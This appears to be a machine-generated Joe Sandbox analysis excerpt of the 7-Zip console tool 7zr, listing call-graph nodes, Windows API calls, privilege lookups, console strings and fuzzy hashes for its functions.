74955 cb540e 75151 cb789c free memmove ctype 74955->75151 75146 ca1e40 free 74956->75146 74960 cb53df 
74960->74955 74962 cb541c 74960->74962 75150 ca42e3 CharUpperW 74960->75150 75147 cb54a0 free ctype 74961->75147 74963 cc36ea 5 API calls 74962->74963 74964 cb5427 74963->74964 74965 ca2fec 3 API calls 74964->74965 74966 cb5433 74965->74966 75152 ca1e40 free 74966->75152 74968 cb543b 75153 cd2db9 free ctype 74968->75153 74971 cb5bf4 __EH_prolog 74970->74971 75154 cb54c0 74971->75154 74974 cb5e17 74974->74916 74975 cc8b05 VariantClear 74976 cb5c34 74975->74976 74976->74974 75169 cb5630 74976->75169 74979 cc36ea 5 API calls 74980 cb5c51 74979->74980 74981 cb5c60 74980->74981 75269 cb57c1 53 API calls 2 library calls 74980->75269 74983 ca2f1c 2 API calls 74981->74983 74984 cb5c6c 74983->74984 74988 cb5caa 74984->74988 75270 cb6217 4 API calls 2 library calls 74984->75270 74986 cb5c91 74987 ca2fec 3 API calls 74986->74987 74989 cb5c9e 74987->74989 74990 cb5d49 74988->74990 74994 ca2e04 2 API calls 74988->74994 75271 ca1e40 free 74989->75271 74992 cb5d91 74990->74992 74993 cb5d55 74990->74993 74999 cb5da6 74992->74999 75190 cb58be 74992->75190 74995 ca2fec 3 API calls 74993->74995 74996 cb5cd2 74994->74996 74998 cb5d66 74995->74998 75272 ca1e40 free 74996->75272 75001 cb5d73 74998->75001 75277 ca5b2d 11 API calls 2 library calls 74998->75277 75000 ca2fec 3 API calls 74999->75000 75078 cb5d8c 74999->75078 75002 cb5dd1 75000->75002 75001->74999 75004 cb5d7b 75001->75004 75006 cb5de7 75002->75006 75017 cb5e41 75002->75017 75002->75078 75007 cb7140 7 API calls 75004->75007 75004->75078 75278 cb6b5e 69 API calls 2 library calls 75006->75278 75007->75078 75009 cb5cf5 75009->74990 75016 ca2fec 3 API calls 75009->75016 75010 cb5eb0 75015 ca1e0c ctype 2 API calls 75010->75015 75012 cb61fa 75293 ca1e40 free 75012->75293 75013 cb5e01 75018 cb5e20 75013->75018 75019 cb5e07 75013->75019 75027 cb5eb7 75015->75027 75020 cb5d0c 75016->75020 75017->75010 75281 cb4115 VariantClear _CxxThrowException __EH_prolog 75017->75281 75018->75078 75273 ca1089 malloc _CxxThrowException free 
_CxxThrowException 75020->75273 75024 cb5d16 75028 ca2f1c 2 API calls 75024->75028 75033 cb5e6e 75033->75010 75040 cb5ece 75033->75040 75041 cb5ea5 75033->75041 75033->75078 75292 ca1e40 free 75078->75292 75080->74920 75081->74920 75082->74903 75084 cc36f4 __EH_prolog 75083->75084 75085 ca2e04 2 API calls 75084->75085 75091 cc370a 75085->75091 75086 cc3736 75087 ca2f1c 2 API calls 75086->75087 75090 cc3742 75087->75090 75360 ca1e40 free 75090->75360 75091->75086 75361 ca1089 malloc _CxxThrowException free _CxxThrowException 75091->75361 75362 ca31e5 malloc _CxxThrowException free _CxxThrowException 75091->75362 75093 cb6633 75093->74913 75093->74917 75094 ca1089 malloc _CxxThrowException free _CxxThrowException 75093->75094 75094->74917 75095->74913 75096->74916 75098 cc8fae __EH_prolog 75097->75098 75099 cc7ebb free 75098->75099 75100 cc8ff2 75099->75100 75131 cc8b64 75100->75131 75103 cb6302 75103->74890 75103->74892 75103->74916 75105 cc9020 75105->75103 75106 ca2fec 3 API calls 75105->75106 75107 cc903a 75106->75107 75120 cc904d 75107->75120 75135 cc8b80 VariantClear 75107->75135 75109 cc9244 75140 ca43b7 5 API calls 2 library calls 75109->75140 75110 cc91b0 75138 cc8b9c 10 API calls 2 library calls 75110->75138 75111 cc9144 75114 ca2f88 3 API calls 75111->75114 75118 cc917b 75111->75118 75114->75118 75115 cc91c0 75115->75103 75124 ca2f88 3 API calls 75115->75124 75116 cc9100 75119 ca965d VariantClear 75116->75119 75117 cc90d6 75117->75116 75122 cc90e7 75117->75122 75137 cc8f2e 9 API calls 75117->75137 75118->75109 75118->75110 75119->75103 75120->75103 75120->75111 75120->75116 75120->75117 75136 ca3097 malloc _CxxThrowException free SysStringLen ctype 75120->75136 75125 ca965d VariantClear 75122->75125 75129 cc91ff 75124->75129 75125->75111 75126 cc9112 75126->75116 75127 cc8b64 VariantClear 75126->75127 75128 cc9123 75127->75128 75128->75116 75128->75122 75129->75103 75139 ca50ff free ctype 75129->75139 75132 cc8b05 VariantClear 75131->75132 75133 cc8b6f 
75132->75133 75133->75103 75134 cc8f2e 9 API calls 75133->75134 75134->75105 75135->75120 75136->75117 75137->75126 75138->75115 75139->75103 75140->75103 75141->74930 75142->74939 75143->74946 75144->74948 75145->74952 75146->74961 75147->74943 75148->74943 75149->74960 75150->74960 75151->74962 75152->74968 75153->74935 75155 cb54ca __EH_prolog 75154->75155 75157 ca965d VariantClear 75155->75157 75159 cb5507 75155->75159 75156 ca965d VariantClear 75158 cb5567 75156->75158 75160 cb5528 75157->75160 75158->74974 75158->74975 75159->75156 75160->75159 75161 cb5572 75160->75161 75162 ca965d VariantClear 75161->75162 75163 cb558e 75162->75163 75294 cb4cac VariantClear __EH_prolog 75163->75294 75165 cb55a1 75165->75158 75295 cb4cac VariantClear __EH_prolog 75165->75295 75167 cb55b8 75167->75158 75296 cb4cac VariantClear __EH_prolog 75167->75296 75170 cb563a __EH_prolog 75169->75170 75172 cb5679 75170->75172 75297 cc3558 10 API calls 2 library calls 75170->75297 75173 ca2f1c 2 API calls 75172->75173 75189 cb571a 75172->75189 75174 cb5696 75173->75174 75298 cc3333 malloc _CxxThrowException free 75174->75298 75176 cb56a2 75177 cb56ad 75176->75177 75178 cb56c5 75176->75178 75299 cb7853 5 API calls 2 library calls 75177->75299 75179 cb56b4 75178->75179 75300 ca4adf wcscmp 75178->75300 75182 cb5707 75179->75182 75302 ca1089 malloc _CxxThrowException free _CxxThrowException 75179->75302 75303 ca31e5 malloc _CxxThrowException free _CxxThrowException 75182->75303 75183 cb56d2 75183->75179 75301 cb7853 5 API calls 2 library calls 75183->75301 75186 cb5712 75304 ca1e40 free 75186->75304 75189->74979 75191 cb58c8 __EH_prolog 75190->75191 75192 ca2e04 2 API calls 75191->75192 75193 cb58e9 75192->75193 75194 ca6c72 44 API calls 75193->75194 75195 cb58fd 75194->75195 75196 cb5905 75195->75196 75200 cb5b2d 75195->75200 75269->74981 75270->74986 75271->74988 75272->75009 75273->75024 75277->75001 75278->75013 75281->75033 75292->75012 75293->74974 75294->75165 75295->75167 75296->75158 
75297->75172 75298->75176 75299->75179 75300->75183 75301->75179 75302->75182 75303->75186 75304->75189 75360->75093 75361->75091 75362->75091 75363 cab5d9 75364 cab5e6 75363->75364 75365 cab5f7 75363->75365 75364->75365 75369 cab5fe 75364->75369 75370 cab608 __EH_prolog 75369->75370 75376 d26a40 VirtualFree 75370->75376 75372 cab63d 75373 ca764c CloseHandle 75372->75373 75374 cab5f1 75373->75374 75375 ca1e40 free 75374->75375 75375->75365 75376->75372 75377 d26bc6 75378 d26bca 75377->75378 75379 d26bcd 75377->75379 75379->75378 75380 d26bd1 malloc 75379->75380 75380->75378 75381 cb1ade 75382 cb1ae8 __EH_prolog 75381->75382 75432 ca13f5 75382->75432 75385 cb1b32 6 API calls 75387 cb1b8d 75385->75387 75396 cb1bf8 75387->75396 75450 cb1ea4 9 API calls 75387->75450 75388 cb1b24 _CxxThrowException 75388->75385 75390 cb1bdf 75451 ca27bb 75390->75451 75394 cb1c89 75446 cb1eb9 75394->75446 75396->75394 75458 cc1d73 5 API calls __EH_prolog 75396->75458 75400 cb1cb2 _CxxThrowException 75400->75394 75433 ca13ff __EH_prolog 75432->75433 75434 cc7ebb free 75433->75434 75435 ca142b 75434->75435 75436 ca1438 75435->75436 75459 ca1212 free ctype 75435->75459 75438 ca1e0c ctype 2 API calls 75436->75438 75442 ca144d 75438->75442 75439 ca14f4 75439->75385 75449 cc1d73 5 API calls __EH_prolog 75439->75449 75440 ce04d2 5 API calls 75440->75442 75442->75439 75442->75440 75444 ca1507 75442->75444 75460 ca1265 5 API calls 2 library calls 75442->75460 75461 ca1524 malloc _CxxThrowException __EH_prolog ctype 75442->75461 75445 ca2fec 3 API calls 75444->75445 75445->75439 75462 ca9313 GetCurrentProcess OpenProcessToken 75446->75462 75449->75388 75450->75390 75452 ca27c7 75451->75452 75453 ca27e3 75451->75453 75452->75453 75454 ca1e0c ctype 2 API calls 75452->75454 75457 ca1e40 free 75453->75457 75455 ca27da 75454->75455 75469 ca1e40 free 75455->75469 75457->75396 75458->75400 75459->75436 75460->75442 75461->75442 75463 ca933a LookupPrivilegeValueW 75462->75463 75464 ca9390 75462->75464 
75465 ca934c AdjustTokenPrivileges 75463->75465 75466 ca9382 75463->75466 75465->75466 75467 ca9372 GetLastError 75465->75467 75468 ca9385 CloseHandle 75466->75468 75467->75468 75468->75464 75469->75453 75470 cb459e 75471 cb45ab 75470->75471 75472 cb45bc 75470->75472 75471->75472 75476 cb45c3 75471->75476 75477 cb45cd __EH_prolog 75476->75477 75505 cb79b2 free ctype 75477->75505 75479 cb45e8 75506 ca1e40 free 75479->75506 75481 cb45f3 75507 cd2db9 free ctype 75481->75507 75483 cb4609 75508 ca1e40 free 75483->75508 75485 cb4610 75509 ca1e40 free 75485->75509 75487 cb461b 75510 ca1e40 free 75487->75510 75489 cb4626 75511 cb794c free ctype 75489->75511 75491 cb4638 75512 cd2db9 free ctype 75491->75512 75493 cb465b 75513 ca1e40 free 75493->75513 75495 cb468e 75514 ca1e40 free 75495->75514 75497 cb46ae 75515 cb4733 free __EH_prolog ctype 75497->75515 75499 cb46be 75516 ca1e40 free 75499->75516 75501 cb46e8 75517 ca1e40 free 75501->75517 75503 cb45b6 75504 ca1e40 free 75503->75504 75504->75472 75505->75479 75506->75481 75507->75483 75508->75485 75509->75487 75510->75489 75511->75491 75512->75493 75513->75495 75514->75497 75515->75499 75516->75501 75517->75503 75518 ca42d1 75519 ca42bd 75518->75519 75520 ca42c5 75519->75520 75521 ca1e0c ctype 2 API calls 75519->75521 75521->75520 75522 cdacd3 75523 cdace0 75522->75523 75524 cdacf1 75522->75524 75523->75524 75528 cdacf8 75523->75528 75533 cdc0b3 __EH_prolog 75528->75533 75529 cdc0ed 75545 ca1e40 free 75529->75545 75531 cdaceb 75535 ca1e40 free 75531->75535 75533->75529 75536 cc7193 75533->75536 75544 ca1e40 free 75533->75544 75535->75524 75537 cc719d __EH_prolog 75536->75537 75546 cd2db9 free ctype 75537->75546 75539 cc71b3 75547 cc71d5 free __EH_prolog ctype 75539->75547 75541 cc71bf 75548 ca1e40 free 75541->75548 75543 cc71c7 75543->75533 75544->75533 75545->75531 75546->75539 75547->75541 75548->75543 75549 cda42c 75550 cda449 75549->75550 75551 cda435 fputs 75549->75551 75708 cd545d 75550->75708 75707 ca1fa0 fputc 
75551->75707 75555 ca2e04 2 API calls 75556 cda4a1 75555->75556 75712 cc1858 75556->75712 75558 cda4c9 75774 ca1e40 free 75558->75774 75560 cda4d8 75561 cda4ee 75560->75561 75775 cdc7d7 75560->75775 75563 cda50e 75561->75563 75783 cd57fb 75561->75783 75793 cdc73e 75563->75793 75568 cdac17 75971 cd2db9 free ctype 75568->75971 75569 ca1e0c ctype 2 API calls 75571 cda53a 75569->75571 75573 cda54d 75571->75573 75929 cdb0fa malloc _CxxThrowException __EH_prolog 75571->75929 75572 cdac23 75574 cdac3a 75572->75574 75577 cdac35 75572->75577 75579 ca2fec 3 API calls 75573->75579 75973 cdb96d _CxxThrowException 75574->75973 75972 cdb988 33 API calls __aulldiv 75577->75972 75578 cdac42 75974 ca1e40 free 75578->75974 75585 cda586 75579->75585 75582 cdac4d 75975 cc3247 75582->75975 75811 cdad06 75585->75811 75684 cdaae5 75970 cd2db9 free ctype 75684->75970 75707->75550 75709 cd5466 75708->75709 75710 cd5473 75708->75710 75985 ca275e malloc _CxxThrowException free ctype 75709->75985 75710->75555 75713 cc1862 __EH_prolog 75712->75713 75986 cc021a 75713->75986 75718 cc18b9 76000 cc1aa5 free __EH_prolog ctype 75718->76000 75720 cc1935 76005 cc1aa5 free __EH_prolog ctype 75720->76005 75721 cc18c7 76001 cd2db9 free ctype 75721->76001 75725 cc1944 75746 cc1966 75725->75746 76006 cc1d73 5 API calls __EH_prolog 75725->76006 75726 cc18d3 75726->75558 75727 ce04d2 5 API calls 75733 cc18db 75727->75733 75729 cc1958 _CxxThrowException 75729->75746 75730 cc19be 76009 ccf1f1 malloc _CxxThrowException free _CxxThrowException 75730->76009 75732 ca2e04 2 API calls 75732->75746 75733->75720 75733->75727 76002 cc0144 malloc _CxxThrowException free _CxxThrowException 75733->76002 76003 ca1524 malloc _CxxThrowException __EH_prolog ctype 75733->76003 76004 ca1e40 free 75733->76004 75736 cc19d6 75737 cc7ebb free 75736->75737 75739 cc19e1 75737->75739 75738 ca631f 9 API calls 75738->75746 75740 cb12d4 4 API calls 75739->75740 75742 cc19ea 75740->75742 75741 ce04d2 5 API calls 75741->75746 75743 cc7ebb 
free 75742->75743 75745 cc19f7 75743->75745 75747 cb12d4 4 API calls 75745->75747 75746->75730 75746->75732 75746->75738 75746->75741 76007 ca1524 malloc _CxxThrowException __EH_prolog ctype 75746->76007 76008 ca1e40 free 75746->76008 75756 cc19ff 75747->75756 75749 cc1a4f 76011 ca1e40 free 75749->76011 75751 cc1a57 76012 cd2db9 free ctype 75751->76012 75753 ca1524 malloc _CxxThrowException 75753->75756 75754 cc1a64 76013 cd2db9 free ctype 75754->76013 75756->75749 75756->75753 75758 cc1a83 75756->75758 76010 ca42e3 CharUpperW 75756->76010 76014 cc1d73 5 API calls __EH_prolog 75758->76014 75760 cc1a97 _CxxThrowException 75761 cc1aa5 __EH_prolog 75760->75761 76015 ca1e40 free 75761->76015 75763 cc1ac8 76016 cc02e8 free ctype 75763->76016 75765 cc1ad1 76017 cc1eab free __EH_prolog ctype 75765->76017 75767 cc1add 76018 ca1e40 free 75767->76018 75769 cc1ae5 76019 ca1e40 free 75769->76019 75771 cc1aed 76020 cd2db9 free ctype 75771->76020 75773 cc1afa 75773->75558 75774->75560 75776 cdc849 75775->75776 75777 cdc7ea 75775->75777 75779 cdc85a 75776->75779 76149 ca1f91 fflush 75776->76149 75778 cdc7fe fputs 75777->75778 76148 ca25cb malloc _CxxThrowException free _CxxThrowException ctype 75777->76148 75778->75776 75779->75561 75784 cd5805 __EH_prolog 75783->75784 75792 cd5847 75784->75792 76150 ca26dd 75784->76150 75790 cd583f 76170 ca1e40 free 75790->76170 75792->75563 75794 cdc748 __EH_prolog 75793->75794 75795 cdc7d7 ctype 6 API calls 75794->75795 75796 cdc75d 75795->75796 76209 ca1e40 free 75796->76209 75798 cdc768 75799 cc2c0b ctype free 75798->75799 75800 cdc775 75799->75800 76210 ca1e40 free 75800->76210 75802 cdc77d 76211 ca1e40 free 75802->76211 75804 cdc785 76212 ca1e40 free 75804->76212 75806 cdc78d 76213 ca1e40 free 75806->76213 75808 cdc795 75809 cc2c0b ctype free 75808->75809 75810 cda51d 75809->75810 75810->75569 75810->75684 76214 cdad29 75811->76214 75814 cdbf3e 75815 ca2fec 3 API calls 75814->75815 75816 cdbf85 75815->75816 75817 ca2fec 3 API calls 

                            Control-flow Graph
                            APIs
                            • GetCurrentProcess.KERNEL32(00000020,00CB1EC5,?,7597AB50,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9329
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9330
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00CA9342
                            • AdjustTokenPrivileges.KERNELBASE(00CB1EC5,00000000,?,00000000,00000000,00000000), ref: 00CA9368
                            • GetLastError.KERNEL32 ref: 00CA9372
                            • CloseHandle.KERNELBASE(00CB1EC5,?,?,?,?,00CB1EC5,00CB1CEF), ref: 00CA9388
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeRestorePrivilege
                            • API String ID: 3398352648-1684392131
                            • Opcode ID: 393a2fe640bebc28a53bfe1b32ff98ef4d65345da23ad873c23979b4d66c2f96
                            • Instruction ID: 9cdb20d2354a12f22ea69b706664d58896e22b0f5a99d2bf109fa1f580632fe7
                            • Opcode Fuzzy Hash: 393a2fe640bebc28a53bfe1b32ff98ef4d65345da23ad873c23979b4d66c2f96
                            • Instruction Fuzzy Hash: 67016D7A946219ABCB605FF19C4ABDE7F7CEF07244F045164A541E2290D6758608D7B0

                            Control-flow Graph
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB3D6B
                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D7D
                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3D94
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00CB3DB6
                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DCB
                            • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3DD5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeSecurityPrivilege
                            • API String ID: 3475889169-2333288578
                            • Opcode ID: eef79f01822a79d62d11d55fb80803fbf08be4a5c96174a4041ede2e1060ef12
                            • Instruction ID: 7f8b8c91387d7b864c071244143215bc21ed92e4642246be61222f2c6f01b59b
                            • Opcode Fuzzy Hash: eef79f01822a79d62d11d55fb80803fbf08be4a5c96174a4041ede2e1060ef12
                            • Instruction Fuzzy Hash: F4115EB5951259AFDF10EFA5DC85AFEFBBCFB05344F004529E412E2290DB358A08CA70
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE81F1
                              • Part of subcall function 00CEF749: _CxxThrowException.MSVCRT(?,00D54A58), ref: 00CEF792
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrow
                            • String ID:
                            • API String ID: 461045715-3916222277
                            • Opcode ID: 4adf57e62320855930b72c8455e134c13c773faaa20f158770f3cef98c09a731
                            • Instruction ID: ce9d7d320c8082d0fd4bb047e1c8459287aa240f3102a9886b3845f7a7dc2413
                            • Opcode Fuzzy Hash: 4adf57e62320855930b72c8455e134c13c773faaa20f158770f3cef98c09a731
                            • Instruction Fuzzy Hash: 8792A230900289DFDF15DFA9C844BAEBBB1BF15304F244099E819AB392CB75DE49DB61
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA686D
                              • Part of subcall function 00CA6848: FindClose.KERNELBASE(00000000,?,00CA6880), ref: 00CA6853
                            • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00CA68A5
                            • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00CA68DE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: Find$FileFirst$CloseH_prolog
                            • String ID:
                            • API String ID: 3371352514-0
                            • Opcode ID: c1f32d54269ad7a1a87acc4e8f21c7cbb2783034d641d583015fe804ef4e5284
                            • Instruction ID: e72ecd1178e4fb8b1c1d011364708d4a9e6769a68ce9704bfe73a063f8116858
                            • Opcode Fuzzy Hash: c1f32d54269ad7a1a87acc4e8f21c7cbb2783034d641d583015fe804ef4e5284
                            • Instruction Fuzzy Hash: DB11043140020ADBCF10EF64C8555EDB778EF12328F144229E9A0571D1DB358EC5EB50

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$ExceptionThrow
                            • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                            • API String ID: 3665150552-429544124
                            • Opcode ID: e8c8cd6f4c34f8551bda9afa31fe3be3dfdf30e6ec4815c4b9b33757e3fd56be
                            • Instruction ID: 13d80fd090416b2ec454cfb62ff9d6ed8c435198c72b34fadef1479194b97272
                            • Opcode Fuzzy Hash: e8c8cd6f4c34f8551bda9afa31fe3be3dfdf30e6ec4815c4b9b33757e3fd56be
                            • Instruction Fuzzy Hash: 8F529C30904259DFCF26EBA4CC85BEDBBB5AF44304F14419AE559A3291DB706F88EF21

                            Control-flow Graph: rendering omitted (entry 00CDA42C, basic blocks 00CDA42C-00CDACB5)
                            APIs
                            • fputs.MSVCRT(Scanning the drive for archives:), ref: 00CDA43E
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                            Similarity
                            • API ID: fputcfputs
                            • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                            • API String ID: 269475090-3104439828
                            • Opcode ID: d70155a3f8e29104d92e0bfe487bb196d091dfd3f589aefe563f2b0a5eb90b09
                            • Instruction ID: 436a0092793807a9983f12bffe423467d79280f41bad12403c59ab831e6658d1
                            • Opcode Fuzzy Hash: d70155a3f8e29104d92e0bfe487bb196d091dfd3f589aefe563f2b0a5eb90b09
                            • Instruction Fuzzy Hash: 09228B30904259DFDF2AEBA4C885BEDFBF1AF44304F14419AE95963291DB706E84EF21

                            Control-flow Graph: rendering omitted (entry 00CD993D, basic blocks 00CD993D-00CDACB5)
                            APIs
                              • Part of subcall function 00CDB5B1: fputs.MSVCRT ref: 00CDB5CA
                              • Part of subcall function 00CDB5B1: fputs.MSVCRT ref: 00CDB5E1
                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00CD99BD
                            • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00CD99C4
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CD9A77
                            • _CxxThrowException.MSVCRT(?,00D555B8), ref: 00CD9ABB
                              • Part of subcall function 00CA1FB3: __EH_prolog.LIBCMT ref: 00CA1FB8
                            Similarity
                            • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                            • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$N
                            • API String ID: 377453556-3661318601
                            • Opcode ID: 76bb0880677d12d09c6e060b6f147e4fa1bef5c4650d62ac1939de1535ce9e66
                            • Instruction ID: 8199c376129b30b62f38b8ea42cfc0c4ba425286a1a77aff206be2746a879fc4
                            • Opcode Fuzzy Hash: 76bb0880677d12d09c6e060b6f147e4fa1bef5c4650d62ac1939de1535ce9e66
                            • Instruction Fuzzy Hash: FE22BE35D00209DFDF15EFA4D885BADBBB1EF48310F20009AE655A7392CB359A85DF61

                            Control-flow Graph: rendering omitted (entry 00CB1ADE, basic blocks 00CB1ADE-00CB1EA1)
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CB1AE3
                              • Part of subcall function 00CA13F5: __EH_prolog.LIBCMT ref: 00CA13FA
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1B2D
                            • _fileno.MSVCRT ref: 00CB1B3E
                            • _isatty.MSVCRT ref: 00CB1B47
                            • _fileno.MSVCRT ref: 00CB1B5D
                            • _isatty.MSVCRT ref: 00CB1B60
                            • _fileno.MSVCRT ref: 00CB1B73
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1CBB
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1DBD
                            • wcscmp.MSVCRT ref: 00CB1DCA
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1E04
                            • _isatty.MSVCRT ref: 00CB1B76
                              • Part of subcall function 00CC1D73: __EH_prolog.LIBCMT ref: 00CC1D78
                            • _CxxThrowException.MSVCRT(?,00D56010), ref: 00CB1E2C
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00CB1E3B
                            • SetProcessAffinityMask.KERNEL32(00000000), ref: 00CB1E42
                            • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00CB1E4C
                            Strings
                            • Unsupported switch postfix for -slp, xrefs: 00CB1DF1
                            • Unsupported switch postfix -bb, xrefs: 00CB1CA8
                            • unsupported value -stm, xrefs: 00CB1E19
                            • Unsupported switch postfix -stm, xrefs: 00CB1DAA
                            • Set process affinity mask: , xrefs: 00CB1D74
                            • SeLockMemoryPrivilege, xrefs: 00CB1D28
                            • : ERROR : , xrefs: 00CB1E52
                            Similarity
                            • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                            • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                            • API String ID: 1826148334-1115009270
                            • Opcode ID: aa144eb115b80880a2afa40376e9c8e5566716ed3444b1d6a8c3a59f9afdad60
                            • Instruction ID: 19a93e8da74d588246f266f676e36b52d49e19a4bdbd570b00c9dc300d922b33
                            • Opcode Fuzzy Hash: aa144eb115b80880a2afa40376e9c8e5566716ed3444b1d6a8c3a59f9afdad60
                            • Instruction Fuzzy Hash: 84C1F2719013859FDB11DFB8C899BD9BFF1AF0A304F488459E895972A2C774EA48CB60

                            Control-flow Graph: rendering omitted (entry 00CD8012, basic blocks 00CD8012-00CD82B9)
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD8017
                            • fputs.MSVCRT ref: 00CD804D
                              • Part of subcall function 00CD8341: __EH_prolog.LIBCMT ref: 00CD8346
                              • Part of subcall function 00CD8341: fputs.MSVCRT ref: 00CD835B
                              • Part of subcall function 00CD8341: fputs.MSVCRT ref: 00CD8364
                            • fputs.MSVCRT ref: 00CD807A
                              • Part of subcall function 00CA1FA0: fputc.MSVCRT ref: 00CA1FA7
                              • Part of subcall function 00CA965D: VariantClear.OLEAUT32(?), ref: 00CA967F
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD81AA
                            • fputs.MSVCRT ref: 00CD81CD
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD8267
                            • SysFreeString.OLEAUT32(00000000), ref: 00CD82B1
                            Similarity
